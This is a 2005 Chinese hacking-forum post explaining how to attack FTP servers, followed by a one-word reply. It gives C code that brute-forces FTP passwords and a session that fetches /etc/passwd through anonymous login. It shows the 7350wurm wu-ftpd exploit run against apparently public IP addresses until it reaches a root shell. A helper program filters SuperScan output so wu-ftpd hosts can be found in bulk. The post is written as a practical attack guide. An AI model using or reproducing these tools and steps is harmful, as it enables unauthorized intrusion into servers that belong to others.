黑色海岸线论坛 - Powered by Discuz! Board

标题: ftp攻击 [打印本页]

作者: 鱼鱼的梦想 时间: 2005-1-2 16:53 标题: ftp攻击

[这个贴子最后由黑色海岸线在 2005/02/18 06:14am 第 1 次编辑] 其实也没有什么的，就是把旧的东西都拿出来再写一次啦， ftp的攻击无非就是对用户的猜解和对的ftp服务器的溢出！那我们来熟悉一下你几乎很熟悉的知识！对用户密码的猜解，我看几乎每个扫描器都有这个功能。一直用别人的工具真的有点不好意思，有点寄人篱下的感觉，不知道大家有没有呢！还有的就是，你对如何扫到密码和用户的过程了解吗？其实不难的！当你在命令行中用ftp命令连接某个ftp服务器的时候，其实也可以用那个来猜密码的就是，手动的，那样的作法太慢了，所以就要自己写点东西来加快进程！ D:>ftp ftp>open 192.168.25.1 Connected to 192.168.25.1. 220 chi-1 Microsoft FTP Service (Version 5.0） User (192.168.25.1none)):anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. password: (看不到的） 530 User 111@ connot log in. Login failed 上面的是一个ftp的登陆过程，其实真正的登陆过程是ftp发给ftp服务器USER anonymous, 然后就会返回个辨认值，比如说上面的331，只后就会等待你输入PASS xxxxx，如何成功就会登陆，不然就要重试。 /**************************************************************/ ...................... int ftp_crack(char *username,char *password,int sock) /* sock 是用socket建立的ftp连接*/ { char *buffer = malloc(1024); recv(sock,buffer,1024,0); bzero(buffer,1024); sprintf(buffer,"USER %s\n",username); /* 把USER 写入buffer */ send(sock, buffer,strlen(buffer),0); /* 用send来发送 */ printf("Try username %s \n",username); recv(sock, buffer, 1024, 0); bzero(buffer,1024); sprintf(buffer,"PASS %s\n",password); send(sock,buffer,strlen(buffer),0); /* 发送PASS */ recv(sock, buffer,1024, 0); printf("Reply : %s \n",buffer); if((strstr(buffer,"incorrect")) == NULL) { /* 判断是否正确 "incorrect"可改成别的，比如windows ftp server的failt" */ printf("\nFound the password %s for user %s\n",password,username); } .................. /***************************************************************/ 上面的是代码中的一段，[全的代码] 对密码的判断就可以自动了！现在网上还很流行的就是很多ftp都可以用anonymous或guest来登陆的，本来没有什么的，不过还是可以利用的啦，比如你可以用cwd命来判断用户，还有的ftp服务器，由于没有了字节的处理，比如..../.../等，就可以下载passwd. D:>ftp ftp> open 192.168.25.3 Connect to 192.168.25.3 220 chi FTP server (version wu-2.6.2.5) ready. User (192.168.25.3none)): anonymous 3331 Guest loin ok, send you complete e-mail address as password. Password: (我写了anonymous，就上了） 230-The response ''anonymous'' is not valid 230-Next time please use your e-mail address as your password 230- for example: joe@192.168.25.1 230 Guest login ok, access restriction apply. ftp>cd /etc 250 CWD command successful. ftp>ls 200 PORT command successful. 550 Bad directory components ftp>get passwd 200 PORT command successful. 150 Opening ASCII mode data connection for passwd (79 bytes). 226 Transfer complete. ftp: 84 bytes received in 0.00Second 84000.00Kbytes/sec. ftp> 在的自己的电脑上的目录下就会找到passwd文件用文本打开就可以了，大多数的是如下的 root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1wner of many system processes:/root:/nonexistent operator:*:2:20ystem &:/usr/guest/operator:/bin/csh bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent games:*:7:13:Games pseudo-user:/usr/games:/nonexistent news:*:8:8:News Subsystem:/:/nonexistent man:*:9:9:Mister Man Pages:/usr/share/man:/nonexistent uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent pop:*:68:6ost Office Owner:/nonexistent:/nonexistent ftp:*:999:999:anonymous ftp account:/home/ftp:/bin/csh nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent joe:*:1001:1001:User &:/home/joe:/bin/csh norm:*:1000:1000:Norman Rossman:/home/norm:/bin/csh khan:*:1008:1008:RobRose Net, khans.com, Robert Jenkins:/home/khan:/bin/csh robrose:*:1056:1056:Robert Jenkins, robrose.com:/home/robrose:/bin/csh secret:*:1002:1002ecretoflife.com:/home/secret:/bin/csh 是shadow过的，不过不重要的，毕竟这种的机子不多了，最少我们也知道对方的用户名了！还有种得到用户名的方法就是用cwd命令，不过这个方法没有多大的可行性！接下来的就是对ftp server的溢出, 网上最常见的就是wu-ftp server的溢出攻击了！ Red Hat Linux release 7.3 (Valhalla) Kernel 2.4.18-3 on an i686 login: chi Password: Last login: Mon Feb 24 13:25:17 from 192.168.25.1 [chi@chi chi]$ ls 7350wurm guest.c openssl-too-open.tar.gz dsniff-2.3-2.i386.rpm ncurses4-5.0-5.i386.rpm sniffit-0.3.7beta-1.i386.rpm guest openssl-too-open [chi@chi chi]$ ./7350wurm 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). Compiled for MnM 01/12/2001..pr0t! usage: ./7350wurm [-h] [-v] [-a] [-D] [-m] [-t ] [-u ] [-p ] [-d host] [-L ] [-A ] -h this help -v be verbose (default: off, twice for greater effect) -a AUTO mode (target from banner) -D DEBUG mode (waits for keypresses) -m enable mass mode (use with care) -t num choose target (0 for list, try -v or -v -v) -u user username to login to FTP (default: "ftp") -p pass password to use (default: "mozilla@") -d dest IP address or fqhn to connect to (default: 127.0.0.1) -L loc override target-supplied retloc (format: 0xdeadbeef) -A addr override target-supplied retaddr (format: 0xcafebabe) [chi@chi chi]$ ./7350wurm -t 0 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). Compiled for MnM 01/12/2001..pr0t! num . description ----+------------------------------------------------------- 1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm] 2 | Debian potato [wu-ftpd_2.6.0-3.deb] 3 | Debian potato [wu-ftpd_2.6.0-5.1.deb] 4 | Debian potato [wu-ftpd_2.6.0-5.3.deb] 5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb] 6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm] 7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm] 8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm] 9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm] 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm] 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm] 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm] 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm] 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm] 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm] 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm] 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm] 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm] 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm] 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm] 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm] 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm] 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm] 26 | SuSE 7.0 [wuftpd.rpm] 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm] 28 | SuSE 7.1 [wuftpd.rpm] 29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm] 30 | SuSE 7.2 [wuftpd.rpm] 31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm] 32 | SuSE 7.3 [wuftpd.rpm] 33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm] 34 | Slackware 7.1 [chi@chi chi]$ ./7350wurm -a -d 62.163.38.207 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). Compiled for MnM 01/12/2001..pr0t! # trying to log into 62.163.38.207 with (ftp/mozilla@) ... failed to connect (user/pass correct?) [chi@chi chi]$ ./7350wurm -a -d 62.163.35.119 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). Compiled for MnM 01/12/2001..pr0t! # trying to log into 62.163.35.119 with (ftp/mozilla@) ... connected. # banner: 220 odin.bilskirner.net FTP server (Version wu-2.6.1-16.7x.1) ready. # successfully selected target from banner ### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] # 1. filling memory gaps # 2. sending bigbuf + fakechunk building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes # 3. triggering free(globlist[1]) ################################################## uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp) Linux 2.2.16-3 #1 Mon Jun 19 18:10:14 EDT 2000 i686 unknown ls -al total 24 drwxr-xr-x 6 root root 4096 Apr 13 16:14 . drwxr-xr-x 37 root root 4096 Feb 8 18:23 .. d--x--x--x 2 root root 4096 Jul 12 2000 bin d--x--x--x 2 root root 4096 Jul 12 2000 etc drwxr-xr-x 2 root root 4096 Jul 12 2000 lib drwxr-sr-x 2 root ftp 4096 Feb 5 2000 pub ....... 至于如何得到对方主机的banner呢，就可以用superscan来扫描，扫个大点的区，还有就是只对21对行扫描并显示主机回应，扫完后你可以一个一个的看，看到是wu-ftp的就可以拿上去试一下，不过个人觉得很累，就写了个把superscan扫描结果简单化的小东东啦！自己用tc编下就可了！[现成的下载] /***********************************************************************************/ #include main(int argc,char *argv[]) { FILE *in; FILE *out; char buf[1024]; int i,j; if(argc<3) { printf("usage : %s ",argv[0]); exit(); } in = fopen(argv[1],"r"); if(in == NULL) puts("File open error"); out = fopen(argv[2],"w"); if(out == NULL) puts("File write error"); while(fgets(buf,65,in) != NULL) { for(i=0;i<=50;i++) { if(buf == ''w'') if(buf[i+1] == ''u'') fputs(buf,out); } } } /*****************************************************************************************/
作者: copyday 时间: 2005-2-18 02:28 标题: ftp攻击

晕`

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2